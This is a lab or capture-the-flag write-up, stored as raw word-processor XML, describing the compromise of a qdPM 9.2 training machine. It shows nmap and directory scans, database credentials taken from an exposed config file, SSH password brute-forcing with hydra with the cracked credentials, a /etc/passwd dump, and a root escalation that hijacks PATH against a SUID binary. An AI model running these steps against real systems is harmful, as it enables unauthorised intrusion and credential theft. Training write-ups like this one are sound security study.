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5"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="60"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>My IP address: 192.168.123.68:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="star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8584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numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">With help </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>command “sudo netdiscover -r 192.168.123.0/24”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> I found </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target IP address(192.168.123.124) and target MAC address (08:00:27:3c:a0:71)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs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0995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ab/>
        <w:t xml:space="preserve">I started scanning with nmap help. I used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">command “sudo nmap -sS -sV -v -p- -T4 -A -oA FirstNmapScan 192.168.123.124” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>and I got next results:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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68490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ab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Useful data: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ab/>
        <w:t>a. Open ports and service versions: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1) 22/tcp</w:t>
        <w:tab/>
        <w:t>ssh</w:t>
        <w:tab/>
        <w:t>OpenSSH 8.4p1 Debian 5 (protocol 2.0) ;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2) 80/tcp</w:t>
        <w:tab/>
        <w:t>http</w:t>
        <w:tab/>
        <w:t>Apache httpd 2.4.48 ((Debian)) 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ab/>
        <w:t>This is website with login form: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3629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ab/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ab/>
        <w:t>Information about site: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ab/>
        <w:t>1. File “robots.txt” exist, but he’s empty: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4607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ab/>
        <w:t>2. Page code is without help;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3. I have a “Password forgetten” button, but need a valid email address;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4. Using commands “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffuf -u http://192.168.31.254:80/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o FirstFfufScan.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” and “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gobuster dir -u http://192.168.31.254:80/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o FirstGobusterScan.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”: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80080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="6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63900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="7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ab/>
        <w:t>Directories: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 xml:space="preserve">1. /images – images, icons, gif, pictures;        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 xml:space="preserve">2. /uploads – directories “attachments” and “users” are empty;           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 xml:space="preserve">3. /css – css styles and pictures;               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4. /template – css styles, pictures, scripts, templates;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 xml:space="preserve">/core            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 xml:space="preserve">/install        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/manual               (Status: 301) [Size: 317] [--&gt; http://192.168.31.254/manual/]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/js                   (Status: 301) [Size: 313] [--&gt; http://192.168.31.254/js/]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/javascript           (Status: 301) [Size: 321] [--&gt; http://192.168.31.254/javascript/]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/sf                   (Status: 301) [Size: 313] [--&gt; http://192.168.31.254/sf/]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/backups              (Status: 301) [Size: 318] [--&gt; http://192.168.31.254/backups/]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/batch                (Status: 301) [Size: 316] [--&gt; http://192.168.31.254/batch/]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3) 3306/tcp</w:t>
        <w:tab/>
        <w:t>mysql   MySQL 8.0.26 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1. Salt: )vBP)\x0E=n@wK\x01\x14}K+\x1A)&amp;f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2. I founded next:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>J���</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>8.0.26�!���B,;7�</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ےےے�ےد</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>����������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>'itg?7/It&lt;�caching_sha2_password�!��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ے„</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>08</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>S01Got packets out of order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”: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50695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="8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4) 33060/tcp</w:t>
        <w:tab/>
        <w:t>mysqlx?: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ab/>
        <w:t>1. I founded next:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“����”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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85950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="9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ab/>
        <w:t>b. OS details: Linux 4.15 – 5.8, maybe Debian.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ab/>
        <w:t>c. Another information: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1) Kernel:  Apache httpd 2.4.48;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2) SSH: OpenSSH 8.4p1 Debian 5 ;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3) MySql:  MySQL 8.0.26 ;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4) Progect Managment Software: qdPM 9.2 ;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5) Programming languagies: Php, MySql ;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6) Libraries: jQuery;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ab/>
        <w:t>I log out first time.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ab/>
        <w:t xml:space="preserve">I log in and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>my IP:192.168.31.31 , target IP: 192.168.31.254</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I scanned website and founded some directories(see above port 80). I founded file “</w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://192.168.31.254:80/core/config/databases.yml</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>file and download it. In this file was dbname and password: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8003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Using command “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mycli mysql:</w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>//qdpmadmin@192.168.31.254</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:3306/qdpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” and password:  UcVQCMQk2STVeS6J – I connect to mysql server. It contains from 2 databases: “qdpm” and “staff”. In database “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>staff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” I founded two tables: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>login and user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.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My algorithm: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1. SHOW databases;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2. USE staff;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3. SHOW tables;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4. SELECT * FROM login;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5. SELECT * FROM user;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3880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I copied names from table user in file “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>users.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” (first letter is in lowercase). Then I see that passwords in the table login encoded in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.I decoded them and write in file “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>passwords.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”. Using tool “hydra” and command “hydra -L users.txt -P passwords.txt ssh://192.168.31.254” I founded two account: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>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>travis – DJceVy98W28Y7wLg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dexter – 7ZwV4qtg42cmUXGX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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5323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First of all I used account “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>travis – DJceVy98W28Y7wLg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I input them in ssh. In directory “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/home/travis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” was first flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ICA{Secret_Project}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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9816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 xml:space="preserve">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</w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Privilege escalation (travis → root):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>1. history is clear, .bash_historry is clear;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>2. 5.10.0-8-amd64 – DirtyPipe;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>3. Users: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root:x:0:0:root:/root:/bin/bash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daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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bin:x:2:2:bin:/bin:/usr/sbin/nologin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sys:x:3:3:sys:/dev:/usr/sbin/nologin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sync:x:4:65534:sync:/bin:/bin/sync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games:x:5:60:games:/usr/games:/usr/sbin/nologin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man:x:6:12:man:/var/cache/man:/usr/sbin/nologin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lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin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mail:x:8:8:mail:/var/mail:/usr/sbin/nologin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news:x:9:9:news:/var/spool/news:/usr/sbin/nologin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uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin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proxy:x:13:13:proxy:/bin:/usr/sbin/nologin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www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin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backup:x:34:34:backup:/var/backups:/usr/sbin/nologin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list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin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irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin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 xml:space="preserve">gnats:x:41:41:Gnats Bug-Reporting System </w:t>
        <w:tab/>
        <w:t>(admin):/var/lib/gnats:/usr/sbin/nologin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nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin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_apt:x:100:65534::/nonexistent:/usr/sbin/nologin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 xml:space="preserve">systemd-timesync:x:101:101:systemd Time </w:t>
        <w:tab/>
        <w:t>Synchronization,,,:/run/systemd:/usr/sbin/nologin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 xml:space="preserve">systemd-network:x:102:103:systemd Network </w:t>
        <w:tab/>
        <w:t>Management,,,:/run/systemd:/usr/sbin/nologin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systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin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messagebus:x:104:110::/nonexistent:/usr/sbin/nologin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 xml:space="preserve">avahi-autoipd:x:105:114:Avahi autoip </w:t>
        <w:tab/>
        <w:t>daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin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sshd:x:106:65534::/run/sshd:/usr/sbin/nologin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systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin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mysql:x:107:115:MySQL Server,,,:/var/lib/mysql:/bin/false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dexter:x:1001:1001::/home/dexter/:/bin/bash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travis:x:1002:1002::/home/travis/:/bin/bash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>4. SUID bits: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/opt/get_access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/usr/bin/chfn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/usr/bin/umount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/usr/bin/gpasswd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/usr/bin/sudo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/usr/bin/passwd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/usr/bin/newgrp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/usr/bin/su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/usr/bin/mount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/usr/bin/chsh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/usr/lib/openssh/ssh-keysign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/usr/lib/dbus-1.0/dbus-daemon-launch-helper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81760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3212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 xml:space="preserve">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>In folder /tmp created directory cat/and exported it in PATH. My algorithm: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>1. echo “/bin/bash” &gt;&gt; /tmp/cat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>2. export PATH=/tmp:$PATH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>3. chmod +x /tmp/cat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>4. run /opt/get_access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>I am root!!!Root flag: ICA{Next_Generation_Self_Renewable_Genetics}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04975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erif">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Liberation Mono">
    <w:altName w:val="Courier New"/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44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spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Sans" w:cs="FreeSans"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="BodyText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BodyText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http://192.168.31.254:80/core/config/databases.yml" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto://qdpmadmin@192.168.31.254" TargetMode="External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98</TotalTime>
  <Application>LibreOffice/24.2.3.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>9</Pages>
  <Words>550</Words>
  <Characters>4896</Characters>
  <CharactersWithSpaces>5576</CharactersWithSpaces>
  <Paragraphs>116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2024-09-04T07:57:21Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-04T20:40:17Z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